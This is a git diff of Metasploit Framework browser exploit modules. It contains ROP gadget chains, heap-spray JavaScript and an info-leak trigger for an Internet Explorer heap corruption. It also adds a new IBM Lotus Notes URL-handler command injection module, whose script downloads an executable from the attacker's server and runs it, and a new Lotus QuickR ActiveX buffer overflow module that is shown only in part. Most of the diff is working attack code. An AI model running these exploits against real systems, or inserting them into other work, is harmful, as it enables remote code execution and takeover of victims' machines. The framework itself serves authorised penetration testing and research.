my_target['Rop'] and datastore['MSHTML'].to_s != '' + print_status("Generating ROP using info-leak: 0x#{leak.to_s(16)}") + code << create_info_leak_rop(my_target, leak) code << payload.encoded - shellcode = Rex::Text.to_unescape(code) + elsif my_target['Rop'] and datastore['MSHTML'].to_s == '' + print_status("Generating ROP using msvcrt") + code << create_rop(my_target, payload.encoded) else - code = payload.encoded - shellcode = Rex::Text.to_unescape(code) + code << payload.encoded end + shellcode = Rex::Text.to_unescape(code) + # 1. Create big block of nops # 2. Compose one block which is nops + shellcode # 3. Repeat the block @@ -321,9 +367,7 @@ class Metasploit3 < Msf::Exploit::Remote var nops = unescape("%u0c0c%u0c0c"); while (nops.length < 0x1000) nops+= nops; - - #{js_shellcode} - + var shellcode = nops.substring(0,0x800 - code.length) + code; while (shellcode.length < 0x40000) shellcode += shellcode; #{js_extract_str} @@ -340,7 +384,8 @@ class Metasploit3 < Msf::Exploit::Remote end # Build the JavaScript string for the attributes - def build_element(element_name, my_target) + # type => "corruption" (default) | "leak" + def build_element(element_name, my_target, type="corruption") dst = Rex::Text.to_unescape([my_target['DispatchDst']].pack("V")) element = '' @@ -356,7 +401,12 @@ class Metasploit3 < Msf::Exploit::Remote # Build attributes 0.upto(max) do |i| - obj = (i==index) ? "unescape(\"#{dst}\")" : "alert" + case type + when "corruption" + obj = (i==index) ? "unescape(\"#{dst}\")" : "alert" + else #leak + obj = "alert" + end element << "#{element_name}.w#{i.to_s} = #{obj}" + "\n" end @@ -369,54 +419,16 @@ class Metasploit3 < Msf::Exploit::Remote # 3. Make holes # 4. Let windows media play the crafted midi file and corrupt the heap # 5. Force the using of the confused tagVARIANT. - def build_trigger(my_target) - - if my_target.name =~ /IE 8 on Windows XP SP3/ - - # Redoing the feng shui if fails makes it reliable - js_trigger = <<-JSTRIGGER - function trigger(){ - var k = 999; - while (k > 0) { - if (typeof(clones[k].w1) == "string") { - } else { - clones[k].w1('come on!'); - } - k = k - 2; - } - feng_shui(); - document.audio.Play(); - } - JSTRIGGER - - select_element = build_element('selob', my_target) - else - - js_trigger = <<-JSTRIGGER - function trigger(){ - var k = 999; - while (k > 0) { - if (typeof(clones[k].w0) == "string") { - } else { - clones[k].w0('come on!'); - } - k = k - 2; - } - feng_shui(); - document.audio.Play(); - } - JSTRIGGER - - select_element = build_element('selob', my_target) - end + def build_trigger(my_target, type="corruption") + js_trigger = build_trigger_fn(my_target, type) + select_element = build_element('selob', my_target, type) trigger = <<-JS var heap = new heapLib.ie(); #{select_element} - var clones=new Array(1000); + var clones = new Array(1000); function feng_shui() { - heap.gc(); var i = 0; @@ -431,7 +443,6 @@ class Metasploit3 < Msf::Exploit::Remote CollectGarbage(); j = j + 2; } - } feng_shui(); @@ -443,85 +454,171 @@ class Metasploit3 < Msf::Exploit::Remote return trigger end - def junk(n=1) - tmp = [] - value = rand_text(4).unpack("L")[0].to_i - n.times { tmp << value } - return tmp + # type = "corruption" (default) | "leak" + def build_trigger_fn(my_target, type="corruption") + js_trigger="" + case type + when "corruption" + js_trigger = js_trigger_fn_corruption(my_target) + when "leak" + js_trigger = js_trigger_fn_leak(my_target) + end + return js_trigger end - def nop - return make_nops(4).unpack("L")[0].to_i + # Redoing the feng shui if fails makes it reliable + def js_trigger_fn_corruption(my_target) + attribute = (my_target.name == 'IE 8 on Windows XP SP3') ? 'w1' : 'w0' + + js = %Q| + function trigger(){ + var k = 999; + while (k > 0) { + if (typeof(clones[k].#{attribute}) == "string") { + } else { + clones[k].#{attribute}('come on!'); + } + k = k - 2; + } + feng_shui(); + document.audio.Play(); + } + | + + return js end - def create_rop_chain(my_target) - - pivot = my_target['StackPivot'] - - case my_target['Rop'] - when :msvcrt - rop_gadgets = - [ - 0x77c539ee, # RETN - pivot, - junk, - 0x77c4e392, # POP EAX # RETN - 0x77c11120, # <- *&VirtualProtect() - 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77c2dd6c, - 0x77c4ec00, # POP EBP # RETN - 0x77c35459, # ptr to 'push esp # ret' - 0x77c47705, # POP EBX # RETN - 0x00000400, # <- change size to mark as executable if needed (-> ebx) - 0x77c3ea01, # POP ECX # RETN - 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) - 0x77c46100, # POP EDI # RETN - 0x77c46101, # ROP NOP (-> edi) - 0x77c4d680, # POP EDX # RETN - 0x00000040, # newProtect (0x40) (-> edx) - 0x77c4e392, # POP EAX # RETN - nop, # NOPS (-> eax) - 0x77c12df9, # PUSHAD # RETN - ].flatten.pack("V*") - - when :msvcr71 - rop_gadgets = - [ - 0x7c347f98, # RETN (ROP NOP) - pivot, # stackpivot - junk, # padding - 0x7c376402, # POP EBP # RETN - 0x7c376402, # skip 4 bytes - 0x7c347f97, # POP EAX # RETN - 0xfffff800, # Value to negate, will become 0x00000201 (dwSize) - 0x7c351e05, # NEG EAX # RETN - 0x7c354901, # POP EBX # RETN - 0xffffffff, - 0x7c345255, # INC EBX # FPATAN # RETN - 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN - 0x7c344f87, # POP EDX # RETN - 0xffffffc0, # Value to negate, will become 0x00000040 - 0x7c351eb1, # NEG EDX # RETN - 0x7c34d201, # POP ECX # RETN - 0x7c38b001, # &Writable location - 0x7c34b8d7, # POP EDI # RETN - 0x7c347f98, # RETN (ROP NOP) - 0x7c364802, # POP ESI # RETN - 0x7c3415a2, # JMP [EAX] - 0x7c347f97, # POP EAX # RETN - 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF (IAT) - 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN - 0x7c345c30, # ptr to 'push esp # ret' - ].flatten.pack('V*') + # Redoing the feng shui if fails makes it reliable + def js_trigger_fn_leak(my_target) + js_trigger = "" + if my_target.name == 'IE 8 on Windows XP SP3' + js_trigger = <<-JSTRIGGER + function trigger(){ + var k = 999; + while (k > 0) { + if (typeof(clones[k].w1) == "string") { + var leak = clones[k].w1.charCodeAt(1)*0x10000 + clones[k].w1.charCodeAt(0) + document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + leak + return; + } + k = k - 2; + } + feng_shui(); + document.audio.Play(); + } + JSTRIGGER end - return rop_gadgets + return js_trigger end + def create_rop(t, p) + # MSVCRT.dll ROP + padding = '' + padding << [0x77C4CA70].pack("V*") #ADD ESP,0C; RET + padding << [t['StackPivot']].pack("V*") + padding << [0x77C4CA73].pack("V*") * 12 #ROP NOPs + generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'}) + end + def create_info_leak_rop(my_target, leak = 0x0) + base = (leak == 0x00) ? 0x63580000 : (leak - @offset) + print_status("Image base of mshtml: 0x%x" %base) + + # Generate the gadgets based on offset + rop_gadgets = '' + case @offset + when 0xd92c8 + rop_gadgets = + [ + :junk, + :junk, + 0x328468, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14 + :junk, + 0x247e5d, # ROP NOPs + 0x247e5d, + 0x247e5d, + 0x247e5d, + 0x247e5d, + 0x247e5d, + 0x247e5d, + 0x247e5c, # POP ESI # RETN [mshtml.dll] + 0x137c, # ptr to &VirtualProtect() [IAT mshtml.dll] + 0x3c8db7, # MOV EDX,DWORD PTR DS:[ESI] # ADD EAX,8BCE8B00 # RETN [mshtml.dll] + 0x42e239, # PUSH EDX # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x08 [mshtml.dll] + :junk, + 0x3460c, # POP EBP # RETN [mshtml.dll] + :junk, + :junk, + 0x23ef79, # & jmp esp [mshtml.dll] + 0x189303, # POP EBX # RETN [mshtml.dll] + :ebx, # 0x00000201-> ebx + 0x20437c, # POP EDX # RETN [mshtml.dll] + :edx, # 0x00000040-> edx + 0xc277, # POP ECX # RETN [mshtml.dll] + 0x53a47d, # &Writable location [mshtml.dll] + 0x4a33e2, # POP EDI # RETN [mshtml.dll] + 0x4b601, # RETN (ROP NOP) [mshtml.dll] + 0x33fbc6, # POP EAX # RETN [mshtml.dll] + :nop, + 0x52c718 # PUSHAD # RETN [mshtml.dll] + ] + + when 0xbf190 + rop_gadgets = + [ + :junk, + 0x3338ae, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14 + :junk, + 0xe9e7, # POP ECX # RETN [mshtml.dll] 0x6358e9e7 + :junk, + :junk, + :junk, + :junk, + :junk, + 0x1318, # ptr to &VirtualProtect() [IAT mshtml.dll] + 0x48b440, # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll] + 0x3dc745, # POP ESI # RETN [mshtml.dll] + :neg, # 0xffffffff + 0x2fb18b, # INC ESI # RETN [mshtml.dll] + 0x35190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll] + 0x4aada7, # POP EBP # RETN [mshtml.dll] + :junk, # Compensates RETN + :junk, # Compensates RETN + 0x1ffc54, # & jmp esp [mshtml.dll] + 0x4498a7, # POP EBX # RETN [mshtml.dll] + :ebx, # 0x00000800: 0x00000201-> ebx + 0x24cce4, # POP EDX # RETN [mshtml.dll] + :edx, # 0x00000040-> edx + 0x158306, # POP ECX # RETN [mshtml.dll] + 0x535098, # &Writable location [mshtml.dll] + 0x1cf217, # POP EDI # RETN [mshtml.dll] + 0xa0001, # RETN (ROP NOP) [mshtml.dll] + 0x349f9b, # POP EAX # RETN [mshtml.dll] + :nop, + 0x2afbe8 # PUSHAD # RETN [mshtml.dll] + ] + end + + nops = make_nops(4).unpack("L")[0].to_i + + rop_gadgets.map! { |e| + if e == :junk + rand_text(4).unpack("L")[0].to_i + elsif e == :neg + 0xffffffff + elsif e == :ebx + 0x00000800 + elsif e == :edx + 0x00000040 + elsif e == :nop + nops + else + base + e + end + } + + chain = rop_gadgets.pack('V*') + return chain + end end - -=begin -6367893A FF51 04 CALL DWORD PTR DS:[ECX+4] -=end diff --git a/modules/exploits/windows/browser/msvidctl_mpeg2.rb b/modules/exploits/windows/browser/msvidctl_mpeg2.rb index 942530ff50..38d3585e30 100644 --- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb +++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -46,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0015' ], diff --git a/modules/exploits/windows/browser/mswhale_checkforupdates.rb b/modules/exploits/windows/browser/mswhale_checkforupdates.rb index 50358bff2f..ce81cea30f 100644 --- a/modules/exploits/windows/browser/mswhale_checkforupdates.rb +++ b/modules/exploits/windows/browser/mswhale_checkforupdates.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2238' ], diff --git a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb index 61ba12d0c8..2fd2977c36 100644 --- a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb +++ b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'dookie', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0018' ], diff --git a/modules/exploits/windows/browser/nis2004_antispam.rb b/modules/exploits/windows/browser/nis2004_antispam.rb index d0e2b02975..baca22059e 100644 --- a/modules/exploits/windows/browser/nis2004_antispam.rb +++ b/modules/exploits/windows/browser/nis2004_antispam.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0363' ], diff --git a/modules/exploits/windows/browser/nis2004_get.rb b/modules/exploits/windows/browser/nis2004_get.rb index b62a5083f0..99468bd8f9 100644 --- a/modules/exploits/windows/browser/nis2004_get.rb +++ b/modules/exploits/windows/browser/nis2004_get.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1689' ], diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb new file mode 100644 index 0000000000..98cc97075c --- /dev/null +++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb @@ -0,0 +1,189 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "IBM Lotus Notes Client URL Handler Command Injection", + 'Description' => %q{ + This modules exploits a command injection vulnerability in the URL handler for + for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with + an specially crafted notes:// URL to execute arbitrary commands with also arbitrary + arguments. This module has been tested successfully on Windows XP SP3 with IE8, + Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Moritz Jodeit', # Vulnerability discovery + 'Sean de Regge', # Vulnerability analysis + 'juan vazquez' # Metasploit + ], + 'References' => + [ + [ 'CVE', '2012-2174' ], + [ 'OSVDB', '83063' ], + [ 'BID', '54070' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ], + [ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ], + [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ] + ], + 'Payload' => + { + 'Space' => 2048, + 'StackAdjustment' => -3500 + }, + 'DefaultOptions' => + { + 'EXITFUNC' => "none", + 'InitialAutoRunScript' => 'migrate -k -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jun 18 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + end + + def exploit + @exe_name = rand_text_alpha(2) + ".exe" + @stage_name = rand_text_alpha(2) + ".js" + super + end + + def on_new_session(session) + if session.type == "meterpreter" + session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") + end + + @dropped_files.delete_if do |file| + win_file = file.gsub("/", "\\\\") + if session.type == "meterpreter" + begin + wintemp = session.fs.file.expand_path("%TEMP%") + win_file = "#{wintemp}\\#{win_file}" + # Meterpreter should do this automatically as part of + # fs.file.rm(). Until that has been implemented, remove the + # read-only flag with a command. + session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) + session.fs.file.rm(win_file) + print_good("Deleted #{file}") + true + rescue ::Rex::Post::Meterpreter::RequestError + print_error("Failed to delete #{win_file}") + false + end + + end + end + + end + + def on_request_uri(cli, request) + + if request.uri =~ /\.exe$/ + return if ((p=regenerate_payload(cli))==nil) + register_file_for_cleanup("#{@stage_name}") unless @dropped_files and @dropped_files.include?("#{@stage_name}") + register_file_for_cleanup("#{@exe_name}") unless @dropped_files and @dropped_files.include?("#{@exe_name}") + data = generate_payload_exe({:code=>p.encoded}) + print_status("Sending payload") + send_response(cli, data, {'Content-Type'=>'application/octet-stream'}) + return + end + + my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] + if datastore['SSL'] + schema = "https" + else + schema = "http" + end + uri = "#{schema}://#{my_host}" + uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe" + + script = "var w=new ActiveXObject('wscript.shell');" + script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');" + script << "var x=new ActiveXObject('Microsoft.XMLHTTP');" + script << "x.open('GET','#{uri}', false);" + script << "x.send();" + script << "var s=new ActiveXObject('ADODB.Stream');" + script << "s.Mode=3;" + script << "s.Type=1;" + script << "s.Open();" + script << "s.Write(x.responseBody);" + script << "s.SaveToFile('#{@exe_name}',2);" + script << "w.Run('#{@exe_name}');" + + vmargs = "/q /s /c echo #{script} > %TEMP%\\\\#{@stage_name}& start cscript %TEMP%\\\\#{@stage_name}& REM" + + link_id = rand_text_alpha(5 + rand(5)) + + js_click_link = %Q| + function clickLink(link) { + var cancelled = false; + + if (document.createEvent) { + var event = document.createEvent("MouseEvents"); + event.initMouseEvent("click", true, true, window, + 0, 0, 0, 0, 0, + false, false, false, false, + 0, null); + cancelled = !link.dispatchEvent(event); + } + else if (link.fireEvent) { + cancelled = !link.fireEvent("onclick"); + } + + if (!cancelled) { + window.location = link.href; + } + } + | + + if datastore['OBFUSCATE'] + js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link) + js_click_link.obfuscate + js_click_link_fn = js_click_link.sym('clickLink') + else + js_click_link_fn = 'clickLink' + end + + + html = <<-EOS + + + + + + + + + EOS + + print_status("Sending html") + send_response(cli, html, {'Content-Type'=>'text/html'}) + + end + +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/novelliprint_callbackurl.rb b/modules/exploits/windows/browser/novelliprint_callbackurl.rb index d852e9f24c..3dfb53c342 100644 --- a/modules/exploits/windows/browser/novelliprint_callbackurl.rb +++ b/modules/exploits/windows/browser/novelliprint_callbackurl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -56,7 +52,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1527' ], diff --git a/modules/exploits/windows/browser/novelliprint_datetime.rb b/modules/exploits/windows/browser/novelliprint_datetime.rb index 1d8b8f7db7..6f02766bd3 100644 --- a/modules/exploits/windows/browser/novelliprint_datetime.rb +++ b/modules/exploits/windows/browser/novelliprint_datetime.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1569' ], diff --git a/modules/exploits/windows/browser/novelliprint_executerequest.rb b/modules/exploits/windows/browser/novelliprint_executerequest.rb index 2416b4dc01..f38251f563 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0935' ], diff --git a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb index 49e6e46105..003743a2ef 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -55,7 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3106' ], diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index df69d927d3..bec17f874b 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2908'], diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb index 1bcfd7a864..0443392adf 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ### # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # metasploit module 'Dr_IDE' # original Exploit from exploit-db.com ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4321' ], diff --git a/modules/exploits/windows/browser/novelliprint_target_frame.rb b/modules/exploits/windows/browser/novelliprint_target_frame.rb index ddc48f1a25..918f8aac83 100644 --- a/modules/exploits/windows/browser/novelliprint_target_frame.rb +++ b/modules/exploits/windows/browser/novelliprint_target_frame.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1568' ], diff --git a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb index 20efb436da..54ea81754c 100644 --- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb +++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4607' ], diff --git a/modules/exploits/windows/browser/orbit_connecting.rb b/modules/exploits/windows/browser/orbit_connecting.rb index 0e8fef00a9..33b1424926 100644 --- a/modules/exploits/windows/browser/orbit_connecting.rb +++ b/modules/exploits/windows/browser/orbit_connecting.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0187' ], diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb index 6e10e5a0c7..52cdb83d3e 100644 --- a/modules/exploits/windows/browser/pcvue_func.rb +++ b/modules/exploits/windows/browser/pcvue_func.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # msf module 'TecR0c ',# msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4915'], diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb index 063697dc73..a1c031c703 100644 --- a/modules/exploits/windows/browser/persits_xupload_traversal.rb +++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3693'], diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb new file mode 100644 index 0000000000..c2b83fcc48 --- /dev/null +++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb @@ -0,0 +1,269 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + include Msf::Exploit::Remote::BrowserAutopwn + + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "6.0", + :ua_maxver => "9.0", + :javascript => true, + :os_name => OperatingSystems::WINDOWS, + :rank => Rank, + :classid => "{05D96F71-87C6-11D3-9BE4-00902742D6E0}", + :method => "Attachment_Times" + }) + + + def initialize(info={}) + super(update_info(info, + 'Name' => "IBM Lotus QuickR qp2 ActiveX Buffer Overflow", + 'Description' => %q{ + This module exploits a buffer overflow vulnerability on the UploadControl + ActiveX. The vulnerability exists in the handling of the "Attachment_Times" + property, due to the insecure usage of the _swscanf. The affected ActiveX is + provided by the qp2.dll installed with the IBM Lotus Quickr product. + + This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, + using the qp2.dll 8.1.0.1800. In order to bypass ASLR the no aslr compatible module + msvcr71.dll is used. This one is installed with the qp2 ActiveX. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gaurav Baruah', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-2176' ], + [ 'OSVDB', '82166' ], + [ 'BID', '53678'], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-134/' ], + [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21596191' ] + ], + 'Payload' => + { + 'Space' => 978, + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + # qp2.dll 8.1.0.1800 + [ 'Automatic', {} ], + [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], + [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], + [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll + [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c } ], + [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll + [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll + [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fe', 'Ret' => 0x7C346B52 } ] # pop esp # ret # msvcr71.dll + ], + 'Privileged' => false, + 'DisclosureDate' => "May 23 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) + print_status("Target selected as: #{t.name}") + return t + end + end + + return nil + end + + def ie_heap_spray(my_target, p) + js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) + js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) + + # Land the payload at 0x0c0c0c0c + case my_target + when targets[7] + # IE 9 on Windows 7 + js = %Q| + function randomblock(blocksize) + { + var theblock = ""; + for (var i = 0; i < blocksize; i++) + { + theblock += Math.floor(Math.random()*90)+10; + } + return theblock; + } + + function tounescape(block) + { + var blocklen = block.length; + var 